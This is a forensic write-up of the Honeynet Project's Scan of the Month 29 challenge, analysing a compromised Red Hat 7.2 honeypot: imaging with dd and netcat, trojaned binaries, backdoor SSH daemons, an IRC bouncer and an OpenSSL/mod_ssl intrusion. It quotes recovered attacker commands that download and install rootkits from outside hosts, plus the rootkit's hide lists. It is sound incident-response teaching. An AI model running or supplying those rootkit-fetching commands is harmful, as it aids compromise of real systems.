SotM Scan29

Djakson Cleber Gonçalves

[email protected]

 

Tools that I used in this challenge:

VMware Workstation 4.000
TASK
Autopsy
DD(1)
nc (Netcat)
Ethereal
Snort_inline
rc.firewall.sh

I chose the mixture of dead and live scan.
Question #1
Describe the process you used to confirm that the live host was compromised while reducing the impact
to the running system and minimizing your trust in the system.
Answer #1
After downloading the md5 and the vmware files, I changed the vmware config file (linux.vmx)
to comply with my computer's configuration:
Ethernet0.vnet = "/dev/vmnet0" to Ethernet0.vnet = "/dev/vmnet8"
I started ethereal listening on the gateway 192.168.1.1 (vmnet8) , and waited for a while to analyze the packets and realized
that there were some outside traffic on the tcp port 65436.

(ip.addr eq 192.168.1.79 and ip.addr eq 213.154.118.200) and (tcp.port eq 65336 and tcp.port eq 1188)
:[email protected] PRIVMSG [[[kgb]]] :Sun Aug 10 20:35:01 :User sic ([[[kgb]]]) disconnecting from stoned server.

I've set the snort_inline rules and the rc.firewall script (NAT wall) to drop all but 80 outbound traffic, I need the 80 allowed for my own traffic.

Entering the honeypot as root.
It says it's on promiscuous mode
I ran the netstat -an command and saw a connection established to our honeypot from 213... on the same port that I've mentioned earlier, I will get back to this subject later.
I checked the mounts available and mounted the cdrom drive to get my nc working and the linux-suspended-md5s file.

Question #2
Explain the impact that your actions had on the running system.
Answer #2
After I've set the rc.firewall, all the established connections, even the hidden ones, were droped and no traffic were allowd beside tcp 80.
The rest of the answers will be at the end of this page.
Back to my system, I started nc with the following command:
nc -v -l -n -p 80 |gzip -cd |dd of=/mnt/win_c/scan29/sda1.img
On the honeypot:
dd if=/dev/sda1 | gzip -c9 | /mnt/cdrom/tmp/nc -n 192.168.1.1 80
I thought it could be useful to get the strings out of sda2 (swap), even not being able to use it with Autopsy, so.
Had to change it in my system
nc -v -l -n -p 80 | gzip -cd |dd of=/mnt/win_c/scan29/sda1.img
And the honeypot.
dd if=/dev/sda2 | gzip -c9 | /mnt/cdrom/tmp/nc -n 192.168.1.1 80
I ran the md5sum against the linux-suspended-md5s and sent the results back to my system.
My system:
nc -v -l -n -p 80 | gzip -cd > /mnt/win_c/scan29/result_check.md5
Honeypot:
md5sum -c /mnt/cdrom/tmp/linux-suspended-md5s | gzip -c9 | /mnt/cdrom/tmp/nc -n 192.168.1.1 80
Back to my system:
grep -i 'failed' result_check.md5 > resultgrep.txt
That gave me all the missing and non-matching files.
Let's start with the binaries:
grep -i 'bin' resultgrep.txt
/usr/bin/top: FAILED
/bin/netstat: FAILED
/bin/ls: FAILED
/bin/ps: FAILED
/sbin/ifconfig: FAILED
These files were modified and probably "trojanized" as we will see later.
Now, let's start dissecating!
With TASK and Autopsy tools installed, all you have to do is edit the fsmorgue file in the morgue directory chosen
when we installed Autopsy.
My file looks like this:
sda1.img linux-ext2 / GMT
It changes itself later with the strings and the timelines.
Get Autopsy's server running like this:
./autopsy -C -m /mnt/win_c/scan29/ 8888 localhost
No cookies /fsmorgue file / port / host.
Get a web browser and:
http://localhost:8888/autopsy
Choose the image file, sda1.img, in my case.
Now, with the resultgrep.txt open, we will have a look around to see what's going on.
In "/" we get .bash_history, obviously misplaced.
cat .bash_history


id
uptime
./inst
hostname
hostname sbm79.dtc.apu.edu
cd /dev/shm/sc
./install sbm79.dtc.apu.edu
rm -rf /var/mail/root
ps x
cd /tmp
ls -a
wget izolam.net/sslstop.tar.gz
ps x
ps aux | grep apache
kill -9 21510 21511 23289 23292 23302

Let's go straight to the point.
We will find the above file sslstop.tar.gz in root's directory.
What do they do?
"This program modifies the httpd.conf to change the defalul SSL port (443)
to something else (114). Then it restarts the apache server."
It did.
Now if we check
Contents Of File: /var/log/httpd/access_log
I know it's realloc but the info is what matters, right?

213.154.118.219 - - [10/Aug/2003:13:16:27 -0700] "GET / HTTP/1.1" 400 385 "-" "-"
213.154.118.219 - - [10/Aug/2003:13:16:37 -0700] "GET / HTTP/1.1" 400 385 "-" "-"
213.154.118.219 - - [10/Aug/2003:13:23:17 -0700] "GET /sumthin HTTP/1.0" 404 279 "-" "-"
There's a lot of talk about "GET /sumthin HTTP/1.0" on the Internet see -> Security...
At last the answers!
Question #3
List the PID(s) of the process(es) that had a suspect port(s) open (i.e. non Red Hat 7.2 default ports).
Answer #3
15119 initd open ports tcp 65336 and 65436
25239 xopen open port udp 3049 tcp 80 and 443
25241 xopen open port 3128
3137 smbd -D open port 2003
Explanation:
That's a tricky one.
If I just query the netstat and the ps commands I would end up with the following suspect ports and pids:
ps axe

PID TTY STAT TIME COMMAND
snip-----------------------------------------------------------------------------
15119 ? S 0:00 initd PWD=/etc/opt/psybnc HOSTNAME=sbm79.dtc.apu.edu LE
25239 ? S 0:00 /lib/.x/s/xopen -q -p 3128 PWD=/lib/.x/s HOSTNAME=local
25241 ? S 0:00 /lib/.x/s/xopen -q -p 3128 PWD=/lib/.x/s HOSTNAME=local
25247 ? S 0:00 /lib/.x/s/lsn PWD=/lib/.x/s HOSTNAME=localhost.localdom
677 ? S 0:00 identd -e -o PWD=/ HOSTNAME=localhost.localdomain CONSO
snip-----------------------------------------------------------------------------
As we can see a psybnc (IRC proxy, bouncer) was renamed to initd and is listening on ports 65336 and 65436.
Now, xopen is not Squid, for sure, it's a sshd listening on port 3128 and a backdoor on port 3049 udp.
With netstat:
netstat -an
tcp 0 0 192.168.1.79:65336 213.154.118.200:1188 ESTABLISHED
tcp 0 0 0.0.0.0:65436 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:443 0.0.0.0:* LISTEN
tcp 0 0 127.0.0.1:25 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:3128 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:65336 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:23 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:21 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:2003 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:113 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:79 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:139 0.0.0.0:* LISTEN
udp 0 0 0.0.0.0:3049 0.0.0.0:*
udp 0 0 0.0.0.0:138 0.0.0.0:*
udp 0 0 192.168.1.79:138 0.0.0.0:*
udp 0 0 0.0.0.0:137 0.0.0.0:*
udp 0 0 192.168.1.79:137 0.0.0.0:*
Here we have 443 and 80 as we normaly do in a server but, there is no httpd running.

I know the Honeypot's netstat and the ps is messed up and I couldn't load fresh ones because of the libraries.
So, using the old ones I checked the list of processes against the dir list of /proc.

PID 5: not in ps output
PID 845: not in ps output
PID 3137: not in ps output
PID 3153: not in ps output

The /proc directory in the image that we have, is empty, so let's check the Honeypot.

On /proc/3153
lrwxrwxrwx 1 root root 0 Aug 10 20:35 exe -> /usr/bin/(swapd)
It sets eth0 to promiscuous mode and logs to /usr/lib/libice.log

Contents Of File: /usr/lib/libice.log
proxyscan.undernet.org => 192.168.1.79 [23]
On /proc/3137
lrwxrwxrwx 1 root root 0 Aug 10 20:36 exe -> /usr/bin/smbd -D
"smbd -D" is the actual name of the file and not a parameter.
It listens on port 2003 and get its config files on /usr/include:
iceconf.h configuration
icekey.h PRIVATE KEY FILE
icepid.h pid number
iceseed.h seed file
On /proc/845
lrwxrwxrwx 1 root root 0 Aug 10 20:36 exe -> /usr/sbin/smbd
A md5sum checked samba server, listens on port 139

Question #4
Were there any active network connections? If so, what address(es) was the other end and what service(s) was it for?
Answer #4
Yes there was a connection from 213.154.118.200:1188 and it was for the "initd" (IRC psybnc) server.
tcp 0 0 192.168.1.79:65336 213.154.118.200:1188 ESTABLISHED


Question #5
How many instances of an SSH server were installed and at what times?
Answer #5
Four instances were installed
xopen installed at Aug 10th 15:32 PDT 2003
sshd installed in Sep 6th 2001
"smbd -D" installed at Aug 10th 13:33 PDT 2003
sp0 installed at Aug 10th 13:33 PDT 2003
Question #6
Which instances of the SSH servers from question 5 were run?
Answer #6
xopen, sshd and "smbd -D"
Question #7
Did any of the SSH servers identified in question 5 appear to have been modified to collect unique information?
If so, was any information collected?
Answer #7
Yes, "smbd -D" and xopen
Info collected:
proxyscan.undernet.org => 192.168.1.79 [23]

String Contents of Fragment 201554 in sda1.img


+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+++++ Informatziile pe care le-ai dorit boss:) +++++
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Hostname : localhost.localdomain (192.168.1.79)
Alternative IP : 127.0.0.1
Host : localhost.localdomain

===============================================================
Distro: Red Hat Linux release 7.2 (Enigma)
===============================================================
Uname -a
Linux localhost.localdomain 2.4.7-10 #1 Thu Sep 6 17:27:27 EDT 2001 i686 unknown
===============================================================
Uptime
1:33pm up 22:59, 1 user, load average: 0.16, 0.03, 0.01
===============================================================
/tmp/sand
===============================================================
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
===============================================================
Yahoo.com ping:
PING 216.115.108.243 (216.115.108.243) from 192.168.1.79 : 56(84) bytes of data.
From 64.152.81.62: Destination Net Unreachable
From 64.152.81.62: Destination Net Unreachable
From 64.152.81.62: Destination Net Unreachable
--- 216.115.108.243 ping statistics ---
6 packets transmitted, 0 packets received, +3 errors, 100% packet loss
===============================================================
Hw info:
CPU Speed: 666.888MHz
CPU Vendor: vendor_id : GenuineIntel
CPU Model: model name : Pentium III (Coppermine)
RAM: 94420 Kb
===============================================================
HDD(s):
Filesystem Type Size Used Avail Use% Mounted on
/dev/sda1 ext3 905M 296M 564M 35% /
none tmpfs 46M 0 46M 0% /dev/shm
===============================================================
inetd-ul...
===============================================================
configurarea ip-urilor..
inet addr:127.0.0.1 Bcast:127.255.255.255 Mask:255.0.0.0
inet addr:192.168.1.79 Bcast:192.168.1.255 Mask:255.255.255.0
===============================================================
Ports open:
tcp 0 0 *:https *:* LISTEN
tcp 0 0 localhost.localdom:smtp *:* LISTEN
tcp 0 0 *:telnet *:* LISTEN
tcp 0 0 *:ssh *:* LISTEN
tcp 0 0 *:ftp *:* LISTEN
tcp 0 0 *:cfinger *:* LISTEN
tcp 0 0 *:auth
snip-----------------------------------------------------------------------------------------
String Contents of Fragment 17040 in sda1.img
#############################################################################
I AM THE GREAT BIG MOUTH
#############################################################################
Real ip:
#############################################################################
SSHD backdoor port:
3128
#############################################################################
Last root login:
Login: root Name: root
Directory: /root Shell: /bin/bash
On since Sat Aug 9 14:35 (PDT) on tty1 1 day idle
New mail received Sun Aug 10 15:30 2003 (PDT)
Unread since Sun Aug 10 13:40 2003 (PDT)
No Plan.
#############################################################################
Uptime:
3:32pm up 1 day, 58 min, 1 user, load average: 1.32, 1.33, 1.30
#############################################################################
*nix type:
Linux
#############################################################################
*nix distribution:
Red Hat Linux release 7.2 (Enigma)
#############################################################################
Hostname:
sbm79.dtc.apu.edu
#############################################################################
Kernel version:
2.4.7-10
#############################################################################
Hardware type:
i686
#############################################################################
Vendor Id:
GenuineIntel
#############################################################################
Interfaces:
lo Link encap:Local Loopback
inet addr:127.0.0.1 Bcast:127.255.255.255 Mask:255.0.0.0
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:1720 errors:24 dropped:0 overruns:0
TX packets:0 errors:0 dropped:0 overruns:1720
eth0 Link encap:10Mbps Ethernet HWaddr 00:0C:29:89:42:93
inet addr:192.168.1.79 Bcast:192.168.1.255 Mask:255.255.255.0
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:5956177 errors:6018 dropped:0 overruns:0
TX packets:0 errors:0 dropped:0 overruns:474528
Interrupt:10 Base address:0x10e0
#############################################################################
Computers in the network:
Address HWtype HWaddress Flags Mask Iface
192.168.1.1 ether 00:50:56:C0:00:00 C eth0
#############################################################################
Model name:
Pentium III (Coppermine)
#############################################################################
CPU speed:
666.888
#############################################################################
Bogomips:
1307.44
#############################################################################
Connection:
PING 66.218.71.198 (66.218.71.198) from 192.168.1.79 : 56(84) bytes of data.
64 bytes from 66.218.71.198: icmp_seq=0 ttl=243 time=7.251 msec
64 bytes from 66.218.71.198: icmp_seq=1 ttl=243 time=37.229 msec
--- 66.218.71.198 ping statistics ---
3 packets transmitted, 2 packets received, 33% packet loss
round-trip min/avg/max/mdev = 7.251/22.240/37.229/14.989 ms
#############################################################################
Open ports:
tcp 0 0 *:https *:* LISTEN
tcp 0 0 localhost.localdom:smtp *:* LISTEN
tcp 0 0 *:squid *:* LISTEN
tcp 0 0 *:telnet *:* LISTEN
tcp 0 0 *:ssh *:* LISTEN
tcp 0 0 *:ftp *:* LISTEN
tcp 0 0 *:cfinger *:* LISTEN
tcp 0 0 *:auth *:* LISTEN
tcp 0 0 *:http *:* LISTEN
tcp 0 0 *:finger *:* LISTEN
tcp 0

Contents Of File: /lib/.x/s/mfs
============================================================
Time: Sun Aug 10 15:40:47 Size: 100
Path: 192.168.1.79 => 63.99.224.38 [21]
------------------------------------------------------------

============================================================ 

Time: Sun Aug 10 15:40:50 Size: 80 Path: 192.168.1.79 => 63.99.224.38 [21]

 ------------------------------------------------------------ ============================================================ 

Time: Sun Aug 10 15:40:56 Size: 60 Path: 192.168.1.79 => 63.99.224.38 [21] 

------------------------------------------------------------ ============================================================ 

Time: Sun Aug 10 15:41:08 Size: 40 Path: 192.168.1.79 => 63.99.224.38 [21] 

------------------------------------------------------------ ============================================================ 

Time: Sun Aug 10 15:41:32 Size: 20 Path: 192.168.1.79 => 63.99.224.38 [21] 

------------------------------------------------------------ ============================================================ 

Time: Sun Aug 10 16:04:13 Size: 44 Path: proxyscan.undernet.org => 192.168.1.79 [23] ------------------------------------------------------------ 

 Question #8 

Which system executables (if any) were trojaned and what configuration files did they use?

 Answer #8

/usr/bin/top
/bin/netstat /dev/ttyoa
/bin/ls /dev/ttyof
/bin/ps /dev/ttyop
/sbin/ifconfig /dev/ttyoa
Let's check the file netstat
On Autopsy if we click on the file and choose the Strings Display and browse the data we will get to this:
"/dev/ttyoa"
Now, if we open /dev/ttyoa, ttyof and ttyop in the same manner we will see
ttyoa
1 213.233
1 24.104
1 217.10
1 216
1 193
1 209.118
3 10001
3 10002
3 13064
3 19
3 69
3 6667
4 10001
4 6667
4 10002
4 19
4 69
4 13064


ttyof
psbnc
smbd
iceconf.h
icekey.h
icepid.h
uptime
startwu
r00t

ttyop
3 swapd
3 psybnc
3 sl2
3 sl3
3 smbd
3 uptime
3 x2
3 startwu
3 scan
3 r00t

Question #9

How and from where was the system likely compromised?

Answer #9

It was compromised using a OpenSSL vulnerability, together with mod_ssl and Apache:


Contents Of File: /var/log/httpd/access_log
213.154.118.219 - - [10/Aug/2003:13:16:27 -0700] "GET / HTTP/1.1" 400 385 "-" "-"
213.154.118.219 - - [10/Aug/2003:13:16:37 -0700] "GET / HTTP/1.1" 400 385 "-" "-"
213.154.118.219 - - [10/Aug/2003:13:23:17 -0700] "GET /sumthin HTTP/1.0" 404 279 "-" "-"

And

Pointed to by inode: 46935
[Sun Aug 10 04:02:01 2003] [notice] Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b DAV/1.0.2 configured -- resuming normal operations
[Sun Aug 10 04:02:01 2003] [notice] suEXEC mechanism enabled (wrapper: /usr/sbin/suexec)
[Sun Aug 10 13:16:27 2003] [error] [client 213.154.118.219] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /
[Sun Aug 10 13:16:37 2003] [error] [client 213.154.118.219] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /
[Sun Aug 10 13:23:17 2003] [error] [client 213.154.118.219] File does not exist: /var/www/html/sumthin
[Sun Aug 10 13:24:29 2003] [error] mod_ssl: SSL handshake failed (server localhost.localdomain:443, client 213.154.118.219) (OpenSSL library error follows)
[Sun Aug 10 13:24:29 2003] [error] OpenSSL: error:1406908F:SSL routines:GET_CLIENT_FINISHED:connection id is different
[Sun Aug 10 13:32:38 2003] [error] mod_ssl: SSL handshake failed (server localhost.localdomain:443, client 213.154.118.219) (OpenSSL library error follows)
[Sun Aug 10 13:32:38 2003] [error] OpenSSL: error:1406908F:SSL routines:GET_CLIENT_FINISHED:connection id is different
[Sun Aug 10 13:40:28 2003] [error] mod_ssl: Child could not open SSLMutex lockfile /etc/httpd/logs/ssl_mutex.800 (System error follows)
[Sun Aug 10 13:40:28 2003] [error] System: No such file or directory (errno: 2)
[Sun Aug 10 13:40:29 2003] [error] mod_ssl: Child could not open SSLMutex lockfile /etc/httpd/logs/ssl_mutex.800 (System error follows)
[Sun Aug 10 13:40:29 2003] [error] System: No such file or directory (errno: 2)
[Sun Aug 10 13:40:29 2003] [error] mod_ssl: Child could not open SSLMutex lockfile /etc/httpd/logs/ssl_mutex.800 (System error follows)
[Sun Aug 10 13:40:29 2003] [error] System: No such file or directory (errno: 2)
snip--------------------------------------------------------------------------------------------------------------------------

nslookup from Mindspring-ns1.mindspring.com

Name extreme-service-11.is.pcnet.ro

Bonus Question

What nationality do you believe the attacker(s) to be, and why?

Answer Bonus

I believe the attacker is Romenian, because of the above info and the tools used.

Aug 10 14:14:41 localhost smbd -D[5505]: log: Connection from 213.154.118.218 port 2020
String Contents of Fragment 17036 in sda1.img
snip----------------------------------------------
wget geocities.com/mybabywhy/rk.tar.gz
tar -zxvf rk.tar.gz
cd sand
./install
wget geocities.com/gavish19/abc.tgz
wget geocities.com/gavish19/abc.tgz
wget www.lugojteam.as.ro/rootkit.tar
ls -a
cd informatii
wget www.lugojteam.as.ro/rootkit.tar
cd /tmp
ls -a
wget www.lugojteam.as.ro/rootkit.tar
wget irinel1979.go.ro/mass2.tgz
ls -a
snip---------------------------------------------


Thank You,

Djakson

[email protected]